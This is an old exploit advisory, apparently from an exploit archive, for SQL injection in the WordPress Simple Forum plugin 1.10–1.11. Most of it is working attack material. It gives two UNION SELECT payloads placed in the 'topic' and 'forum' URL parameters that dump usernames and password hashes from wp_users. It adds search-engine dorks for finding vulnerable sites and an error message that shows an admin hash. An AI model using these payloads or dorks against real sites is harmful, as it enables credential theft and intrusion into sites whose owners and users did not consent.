Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability
2008-02-15 00:00:00###############################################################
#
# Simple Forum Version 1.10-1.11 SQL Injection
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : [email protected]
#
################################################################
Simple Forum - Version 1.10
Simple Forum - Version 1.10 - ( 2.1.3)
Simple Forum - Version 1.11
################################################################
EXPLAÄ°N=
sametimes password and username in error massege for axample you can see in
(bazen şifreler hataların içindedir)
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '|admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**' at line 1]
UPDATE wp_sftopics SET topic_opened = |admin|b8329b6e20b9f84f7b44ee678a5f484d| WHERE topic_id=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
################################################################
DORK 1 :
Simple Forum - Version 1.10
Simple Forum - Version 1.10 - ( 2.1.3)
Simple Forum - Version 1.11
DORK 2 : allinurl: topic "forums?forum="
################################################################
example
http://xxxxx/forums?forum=xxxx&topic= (expliot)
EXPLOÄ°T 1 :
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
EXPLOÄ°T 2 :
SÄ°METÄ°MES YOU CANT SEE (xxxx&topic) SOO USE THÄ°S EXPLOÄ°T AFTER forum=xxx(number)
example
www.xxxxx/forums?forum=1(expliot)
&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.